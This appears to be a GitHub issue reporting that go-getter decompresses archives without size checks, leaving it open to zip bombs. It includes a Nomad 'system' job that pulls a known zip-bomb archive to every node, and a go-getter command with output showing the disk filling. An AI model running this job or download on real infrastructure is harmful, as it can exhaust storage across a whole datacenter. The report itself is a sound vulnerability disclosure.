Vulnerable to Zip bombs. #407
Description
Zip bombs or compression bombs are trick archives that are custom structured to generate Terabytes of garbage (or zeros) from a small archive. It turns out go-getter's decompression options and detectors are susceptible to this. This is behaviour by design but it might be a good idea if go-getter verified an archive's size will fit in storage before decompression. This doesn't just apply to zip files but also xz, zstd, etc. Downloading a zip bomb today is actually detected and block by Chrome and some browsers to prevent you from accidentally filling your partition.
A crafty Nomad job of type "system" could instantly bring down an entire Nomad DC if the artifact is downloaded to all nodes and expanded to fill all storage. This pseudojob is missing the exec driver.
job "bomb" {
type = "system"
datacenters = ["dc1"]
group "artifacts" {
task "server" {
artifact {
source = "https://www.bamsoftware.com/hacks/zipbomb/zblg.zip"
destination = "/tmp/some-directory"
options {
checksum = "md5:207b597f03033b2e0644bbbc29f04053"
}
}
}
}
}
Beware zip bombs and please use caution if trying to reproduce this:
https://www.bamsoftware.com/hacks/zipbomb/
$ ~/go/bin/go-getter https://www.bamsoftware.com/hacks/zipbomb/zblg.zip /tmp/
2023/01/19 13:11:00 Error downloading: write /tmp/1: no space left on device